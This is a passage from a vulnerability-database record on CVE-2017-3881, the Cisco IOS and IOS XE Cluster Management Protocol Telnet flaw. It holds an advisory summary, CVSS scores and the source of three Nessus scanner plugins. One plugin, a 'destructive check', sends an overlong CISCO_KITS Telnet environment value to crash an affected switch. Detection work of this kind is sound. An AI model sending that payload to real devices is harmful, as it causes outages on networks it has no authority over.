Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. 
The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. 
Cisco Bug IDs: CSCvd48893.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-3881", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2020-07-30T00:00:00", "id": "AKB:03BDD457-EC02-4410-980D-4DF5F9581298", "href": "https://attackerkb.com/topics/JUjQ3NwnXS/cve-2017-3881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:10:33", "description": "According to its self-reported version and configuration, the Cisco IOS XE software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. 
An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code.", "cvss3": {}, "published": "2017-03-27T00:00:00", "type": "nessus", "title": "Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20170317-CMP-IOSXE.NASL", "href": "https://www.tenable.com/plugins/nessus/97992", "sourceData": "#TRUSTED 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\n#TRUST-RSA-SHA256 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\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97992);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-3881\");\n script_bugtraq_id(96960);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvd48893\");\n script_xref(name:\"IAVA\", value:\"2017-A-0073\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20170317-cmp\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version and configuration, the Cisco\nIOS XE software running on the remote device is affected by a remote\ncode execution vulnerability in the Cluster Management Protocol (CMP)\nsubsystem due to improper handling of CMP-specific Telnet options. 
An\nunauthenticated, remote attacker can exploit this by establishing a\nTelnet session with malformed CMP-specific telnet options, to execute\narbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb68237\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvd48893. Alternatively, as a workaround, disable the Telnet\nprotocol for incoming connections.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nflag = 0;\noverride = 0;\ncmds = make_list();\n\nver = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\n\n# Check for vuln version\n# these were extracted from the CVRF\nif (\n ver == \"2.2.0\" ||\n ver == \"2.2.1\" ||\n ver == \"2.2.2\" ||\n ver == \"2.2.3\" ||\n ver == \"2.3.0\" ||\n ver == \"2.3.1\" ||\n ver == \"2.3.1t\" ||\n ver == \"2.3.2\" ||\n ver == \"2.4.0\" ||\n ver == \"2.4.1\" ||\n ver == \"2.4.2\" ||\n ver == \"2.4.3\" ||\n ver == \"2.5.0\" ||\n ver == \"2.5.1\" ||\n ver == \"2.6.0\" ||\n ver == \"2.6.1\" ||\n ver == \"3.1.0SG\" ||\n ver == \"3.1.1SG\" ||\n ver == \"3.2.0SG\" ||\n ver == \"3.2.0XO\" ||\n ver == \"3.2.10SG\" ||\n ver == \"3.2.11SG\" ||\n ver == \"3.2.2SG\" ||\n ver == \"3.2.3SG\" ||\n ver == \"3.2.4SG\" ||\n ver == \"3.2.5SG\" ||\n ver == \"3.2.6SG\" ||\n ver == \"3.2.7SG\" ||\n ver == \"3.2.8SG\" ||\n ver == \"3.2.9SG\" ||\n ver == \"3.3.0SG\" ||\n ver == \"3.3.0SQ\" ||\n ver == \"3.3.0XO\" ||\n ver == \"3.3.1SG\" ||\n ver == \"3.3.1SQ\" ||\n ver == \"3.3.1XO\" ||\n ver == \"3.3.2SG\" ||\n ver == \"3.3.2XO\" ||\n ver == \"3.4.0SG\" ||\n ver == \"3.4.0SQ\" ||\n ver == \"3.4.1SG\" ||\n ver == \"3.4.1SQ\" ||\n ver == \"3.4.2SG\" ||\n ver == \"3.4.3SG\" ||\n ver == \"3.4.4SG\" ||\n ver == \"3.4.5SG\" ||\n ver == \"3.4.6SG\" ||\n ver == \"3.4.7aSG\" ||\n ver == \"3.4.7SG\" ||\n ver == \"3.4.8SG\" ||\n ver == \"3.4.9SG\" ||\n ver == \"3.5.0E\" ||\n ver == \"3.5.0SQ\" ||\n ver == \"3.5.1E\" ||\n ver == \"3.5.1SQ\" ||\n ver == \"3.5.2E\" ||\n ver == \"3.5.2SQ\" ||\n ver == \"3.5.3E\" ||\n ver == \"3.5.3SQ\" ||\n ver == \"3.5.4SQ\" ||\n ver == \"3.5.5SQ\" ||\n ver == \"3.6.0E\" ||\n ver == \"3.6.1E\" ||\n ver == \"3.6.2E\" ||\n ver == \"3.6.3E\" ||\n ver == \"3.6.4E\" ||\n ver == \"3.6.5aE\" 
||\n ver == \"3.6.5bE\" ||\n ver == \"3.6.5E\" ||\n ver == \"3.6.6E\" ||\n ver == \"3.7.0E\" ||\n ver == \"3.7.1E\" ||\n ver == \"3.7.2E\" ||\n ver == \"3.7.3E\" ||\n ver == \"3.7.4E\" ||\n ver == \"3.8.0E\" ||\n ver == \"3.8.0EX\" ||\n ver == \"3.8.1E\" ||\n ver == \"3.8.2E\" ||\n ver == \"3.8.3E\" ||\n ver == \"3.9.0E\" ||\n ver == \"3.9.1E\"\n)\n flag++;\n\nif(!flag)\n audit(AUDIT_INST_VER_NOT_VULN, \"Cisco IOS XE\", ver);\n\n# Check if the CMP subsystem is present, then\n# Check that device is configured to accept incoming Telnet connections\nif (get_kb_item(\"Host/local_checks_enabled\"))\n{\n flag = 0;\n\n # CMP subsystem check\n command = \"show subsys class protocol | include ^cmp\";\n command_kb = \"Host/Cisco/Config/\" + command;\n buf = cisco_command_kb_item(command_kb, command);\n if (check_cisco_result(buf))\n {\n if (!preg(string:buf, pattern:\"^cmp\\s+Protocol\", multiline:TRUE))\n {\n # cmp subsystem is not present, so we can audit out as the\n # device is not vuln\n audit(AUDIT_INST_VER_NOT_VULN, \"Cisco IOS XE\", ver + \" without the CMP subsystem\");\n }\n # otherwise the CMP subsystem is present so we continue on to check\n # if incoming telnet is enabled\n cmds = make_list(cmds, command);\n }\n else if (cisco_needs_enable(buf))\n {\n flag = 1;\n override = 1;\n }\n\n # check that the device is configured to accept incoming Telnet connections\n # from the advisory\n command = \"show running-config | include ^line vty|transport input\";\n command_kb = \"Host/Cisco/Config/\" + command;\n buf = cisco_command_kb_item(command_kb, command);\n if (check_cisco_result(buf))\n {\n # if transport input lists \"all\" or \"telnet\", we are vuln\n # otherwise, if there is a \"line vty\" that is not followed by a\n # transport input line, we are vuln\n # otherwise, we are not vuln\n if (preg(string:buf, pattern:\"^\\s+transport input.*(all|telnet).*\", multiline:TRUE))\n {\n flag = 1;\n cmds = make_list(cmds, command);\n }\n else\n {\n lines = split(buf, 
keep:FALSE);\n for (i = 0; i < max_index(lines); i++)\n {\n line = lines[i];\n if ((i+1) >= max_index(lines))\n next_line = \"\";\n else\n next_line = lines[i+1];\n\n if (line =~ \"^line vty\" && next_line !~ \"^\\s+transport input\")\n {\n flag = 1;\n cmds = make_list(cmds, command);\n break;\n }\n }\n }\n }\n else if (cisco_needs_enable(buf))\n {\n flag = 1;\n override = 1;\n }\n\n # no CMP subsystem, no telnet enabled = not vuln\n if (!flag && !override) audit(AUDIT_OS_CONF_NOT_VULN, \"Cisco IOS XE\", ver);\n}\n\nif (flag)\n{\n security_report_cisco(\n port : 0,\n severity : SECURITY_HOLE,\n override : override,\n version : ver,\n bug_id : 'CSCvd48893',\n cmds : cmds\n );\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:30", "description": "The remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. 
An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code.", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "nessus", "title": "Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20170317-CMP-DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/103783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103783);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-3881\");\n script_bugtraq_id(96960);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvd48893\");\n script_xref(name:\"IAVA\", value:\"2017-A-0073\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20170317-cmp\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote device is affected by a remote code execution\nvulnerability in the Cluster Management Protocol (CMP) subsystem due\nto improper handling of CMP-specific Telnet options. 
An\nunauthenticated, remote attacker can exploit this by establishing a\nTelnet session with malformed CMP-specific telnet options, to execute\narbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb68237\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvd48893. Alternatively, as a workaround, disable the Telnet\nprotocol for incoming connections.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_KILL_HOST);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"telnet.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"telnet_func.inc\");\n\nport = get_service(svc: 'telnet', default: 23, exit_on_fail: 1);\n\nsoc = open_sock_tcp(port);\nif (! soc) audit(AUDIT_SOCK_FAIL, port);\n\nIAC = '\\xff';\nENV = '\\x24';\nIS = '\\x00';\nSEND = '\\x01';\nUSERVAR = '\\x03';\nVALUE = '\\x01';\nSB \t = raw_string(OPT_SUBOPT);\nSE = raw_string(OPT_ENDSUBOPT);\n\n# Consume what the server sends \ntelnet_negotiate(socket:soc); \n\n# Query environment variables\nreq = IAC + SB + ENV + SEND + USERVAR + IAC + SE;\nsend(socket: soc, data: req);\nr = recv(socket: soc, length: 1024);\n\n# Affected devices should have the \"CISCO_KITS\" variable\nenv_name = 'CISCO_KITS';\nif (env_name >!< r)\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n# Three parts in env value\nenv_val = \n '3:' \n + crap(data:'A', length:0x400) # data to be copied to a stack buf\n # seen: 0x80 bytes to RA\n + ':9:';\n\n# Attempt to crash the switch\nreq = IAC + SB + ENV + IS + USERVAR + env_name + VALUE + env_val + IAC + SE;\nsend(socket: soc, data: req);\nsleep(3);\nclose(soc);\n\nif (service_is_dead(port:port))\n{\n security_report_v4(\n port: port,\n severity: SECURITY_HOLE\n ); \n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:04", "description": "According to its self-reported version and configuration, the Cisco IOS software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. 
An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code.", "cvss3": {}, "published": "2017-03-27T00:00:00", "type": "nessus", "title": "Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20170317-CMP-IOS.NASL", "href": "https://www.tenable.com/plugins/nessus/97991", "sourceData": "#TRUSTED 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\n#TRUST-RSA-SHA256 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\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97991);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-3881\");\n script_bugtraq_id(96960);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvd48893\");\n script_xref(name:\"IAVA\", value:\"2017-A-0073\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20170317-cmp\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version and configuration, the Cisco IOS software running on the remote device is\naffected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper\nhandling of CMP-specific Telnet options. 
An unauthenticated, remote attacker can exploit this by establishing a Telnet\nsession with malformed CMP-specific telnet options, to execute arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb68237\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvd48893. Alternatively, as a workaround, disable\nthe Telnet protocol for incoming connections.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco IOS');\n\nvar version_list=make_list(\n '12.2(22)S',\n '12.2(20)S',\n '12.2(18)S',\n '12.2(25)S',\n '12.2(20)S2a',\n '12.2(20)S4a',\n '12.2(20)S5',\n '12.2(18)S1',\n '12.2(20)S4',\n '12.2(18)S2',\n '12.2(18)S4',\n '12.2(25)S2',\n '12.2(20)S2',\n '12.2(18)S3',\n '12.2(20)S6',\n '12.2(20)S3',\n '12.2(25)S1',\n '12.2(20)S1',\n '12.1(9)EX',\n '12.2(14)SZ',\n '12.2(14)SZ5',\n '12.2(14)SZ6',\n '12.2(14)SZ3',\n '12.2(14)SZ4',\n '12.2(14)SZ1',\n '12.2(14)SZ2',\n '12.2(25)EW',\n '12.2(20)EWA',\n '12.2(25)EWA',\n '12.2(25)EWA6',\n '12.2(25)EWA5',\n '12.2(25)EWA1',\n '12.2(25)EWA10',\n '12.2(25)EWA8',\n '12.2(20)EWA1',\n '12.2(25)EWA11',\n '12.2(25)EWA9',\n '12.2(25)EWA2',\n '12.2(25)EWA14',\n '12.2(25)EWA4',\n '12.2(20)EWA3',\n '12.2(25)EWA3',\n '12.2(25)EWA7',\n '12.2(20)EWA4',\n '12.2(25)EWA12',\n '12.2(25)EWA13',\n '12.2(20)EWA2',\n '12.2(35)SE',\n '12.2(18)SE',\n '12.2(20)SE',\n '12.2(25)SE',\n '12.2(37)SE',\n '12.2(53)SE1',\n '12.2(55)SE',\n '12.2(25)SE2',\n '12.2(40)SE2',\n '12.2(46)SE',\n '12.2(46)SE2',\n '12.2(50)SE2',\n '12.2(35)SE5',\n '12.2(50)SE1',\n '12.2(44)SE2',\n '12.2(20)SE3',\n '12.2(35)SE1',\n '12.2(50)SE5',\n '12.2(44)SE1',\n '12.2(53)SE',\n '12.2(37)SE1',\n '12.2(25)SE3',\n '12.2(35)SE3',\n '12.2(44)SE4',\n '12.2(55)SE3',\n '12.2(55)SE2',\n '12.2(40)SE',\n '12.2(44)SE',\n '12.2(52)SE',\n '12.2(58)SE',\n '12.2(50)SE3',\n '12.2(55)SE1',\n '12.2(35)SE2',\n '12.2(18)SE1',\n '12.2(40)SE1',\n '12.2(20)SE1',\n '12.2(44)SE6',\n '12.2(44)SE3',\n '12.2(53)SE2',\n '12.2(52)SE1',\n '12.2(46)SE1',\n '12.2(20)SE2',\n '12.2(54)SE',\n '12.2(44)SE5',\n '12.2(50)SE4',\n '12.2(50)SE',\n '12.2(20)SE4',\n '12.2(58)SE1',\n '12.2(55)SE4',\n '12.2(58)SE2',\n '12.2(55)SE5',\n '12.2(55)SE6',\n '12.2(55)SE7',\n 
'12.2(55)SE8',\n '12.2(55)SE9',\n '12.2(55)SE10',\n '12.2(55)SE11',\n '12.1(14)AZ',\n '12.2(20)EU',\n '12.2(20)EU1',\n '12.2(20)EU2',\n '12.2(20)EX',\n '12.2(44)EX',\n '12.2(40)EX3',\n '12.2(40)EX',\n '12.2(52)EX',\n '12.2(44)EX1',\n '12.2(40)EX2',\n '12.2(40)EX1',\n '12.2(55)EX',\n '12.2(46)EX',\n '12.2(52)EX1',\n '12.2(55)EX1',\n '12.2(55)EX2',\n '12.2(55)EX3',\n '12.2(58)EX',\n '12.2(25)SEB',\n '12.2(25)SEB2',\n '12.2(25)SEB1',\n '12.2(25)SEB4',\n '12.2(25)SEB3',\n '12.2(25)SEA',\n '12.2(25)EY',\n '12.2(46)EY',\n '12.2(55)EY',\n '12.2(25)EY1',\n '12.2(53)EY',\n '12.2(25)EY3',\n '12.2(37)EY',\n '12.2(25)EY2',\n '12.2(25)EY4',\n '12.2(25)EZ',\n '12.2(25)EZ1',\n '12.2(58)EZ',\n '12.2(53)EZ',\n '12.2(55)EZ',\n '12.2(60)EZ4',\n '12.2(60)EZ5',\n '12.2(25)SEC',\n '12.2(25)SEC2',\n '12.2(25)SEC1',\n '12.2(31)SG',\n '12.2(25)SG',\n '12.2(37)SG',\n '12.2(44)SG',\n '12.2(50)SG3',\n '12.2(31)SG1',\n '12.2(53)SG',\n '12.2(31)SG3',\n '12.2(50)SG6',\n '12.2(53)SG1',\n '12.2(46)SG',\n '12.2(25)SG1',\n '12.2(53)SG2',\n '12.2(50)SG5',\n '12.2(37)SG1',\n '12.2(53)SG3',\n '12.2(50)SG8',\n '12.2(25)SG3',\n '12.2(50)SG2',\n '12.2(40)SG',\n '12.2(25)SG2',\n '12.2(54)SG1',\n '12.2(44)SG1',\n '12.2(50)SG1',\n '12.2(52)SG',\n '12.2(54)SG',\n '12.2(31)SG2',\n '12.2(50)SG',\n '12.2(25)SG4',\n '12.2(50)SG7',\n '12.2(53)SG4',\n '12.2(50)SG4',\n '12.2(46)SG1',\n '12.2(53)SG5',\n '12.2(53)SG6',\n '12.2(53)SG7',\n '12.2(53)SG8',\n '12.2(53)SG9',\n '12.2(53)SG10',\n '12.2(53)SG11',\n '12.2(25)FX',\n '12.2(25)FY',\n '12.2(25)SEF',\n '12.2(25)SEF1',\n '12.2(25)SEF2',\n '12.2(25)SEF3',\n '12.2(25)SEE',\n '12.2(25)SEE1',\n '12.2(25)SEE3',\n '12.2(25)SEE4',\n '12.2(25)SEE2',\n '12.2(25)SED',\n '12.2(25)SED1',\n '12.2(31)SGA',\n '12.2(31)SGA3',\n '12.2(31)SGA2',\n '12.2(31)SGA10',\n '12.2(31)SGA5',\n '12.2(31)SGA4',\n '12.2(31)SGA11',\n '12.2(31)SGA6',\n '12.2(31)SGA1',\n '12.2(31)SGA7',\n '12.2(31)SGA8',\n '12.2(31)SGA9',\n '12.2(25)SEG',\n '12.2(25)SEG1',\n '12.2(25)SEG3',\n '12.2(25)FZ',\n 
'12.2(44)SQ',\n '12.2(44)SQ2',\n '12.2(50)SQ2',\n '12.2(50)SQ1',\n '12.2(50)SQ',\n '12.2(50)SQ3',\n '12.2(50)SQ4',\n '12.2(50)SQ5',\n '12.2(50)SQ6',\n '12.2(50)SQ7',\n '15.0(1)XO1',\n '15.0(1)XO',\n '15.0(2)XO',\n '15.0(1)EY',\n '15.0(1)EY1',\n '15.0(1)EY2',\n '15.0(2)EY',\n '15.0(2)EY1',\n '15.0(2)EY2',\n '15.0(2)EY3',\n '12.2(54)WO',\n '12.2(27)SBK9',\n '15.0(1)SE',\n '15.0(2)SE',\n '15.0(1)SE1',\n '15.0(1)SE2',\n '15.0(1)SE3',\n '15.0(2)SE1',\n '15.0(2)SE2',\n '15.0(2)SE3',\n '15.0(2)SE4',\n '15.0(2)SE5',\n '15.0(2)SE6',\n '15.0(2)SE7',\n '15.0(2)SE8',\n '15.0(2)SE9',\n '15.0(2a)SE9',\n '15.0(2)SE10',\n '15.0(2)SE10a',\n '15.1(1)SG',\n '15.1(2)SG',\n '15.1(1)SG1',\n '15.1(1)SG2',\n '15.1(2)SG1',\n '15.1(2)SG2',\n '15.1(2)SG3',\n '15.1(2)SG4',\n '15.1(2)SG5',\n '15.1(2)SG6',\n '15.1(2)SG7',\n '15.1(2)SG8',\n '15.0(2)SG',\n '15.0(2)SG1',\n '15.0(2)SG2',\n '15.0(2)SG3',\n '15.0(2)SG4',\n '15.0(2)SG5',\n '15.0(2)SG6',\n '15.0(2)SG7',\n '15.0(2)SG8',\n '15.0(2)SG9',\n '15.0(2)SG10',\n '15.0(2)SG11',\n '15.0(2)EX',\n '15.0(2)EX1',\n '15.0(2)EX2',\n '15.0(2)EX3',\n '15.0(2)EX4',\n '15.0(2)EX5',\n '15.0(2)EX6',\n '15.0(2)EX7',\n '15.0(2)EX8',\n '15.0(2a)EX5',\n '15.0(2)EX10',\n '15.0(2)EX11',\n '15.0(2)EX13',\n '15.0(2)EX12',\n '15.2(1)E',\n '15.2(2)E',\n '15.2(1)E1',\n '15.2(3)E',\n '15.2(1)E2',\n '15.2(1)E3',\n '15.2(2)E1',\n '15.2(2b)E',\n '15.2(4)E',\n '15.2(3)E1',\n '15.2(2)E2',\n '15.2(2a)E1',\n '15.2(2)E3',\n '15.2(2a)E2',\n '15.2(3)E2',\n '15.2(3a)E',\n '15.2(3)E3',\n '15.2(3m)E2',\n '15.2(4)E1',\n '15.2(2)E4',\n '15.2(2)E5',\n '15.2(4)E2',\n '15.2(4m)E1',\n '15.2(3)E4',\n '15.2(5)E',\n '15.2(3m)E7',\n '15.2(4)E3',\n '15.2(2)E6',\n '15.2(5a)E',\n '15.2(5)E1',\n '15.2(5b)E',\n '15.2(4m)E3',\n '15.2(3m)E8',\n '15.2(2)E5a',\n '15.2(5c)E',\n '15.2(3)E5',\n '15.2(2)E5b',\n 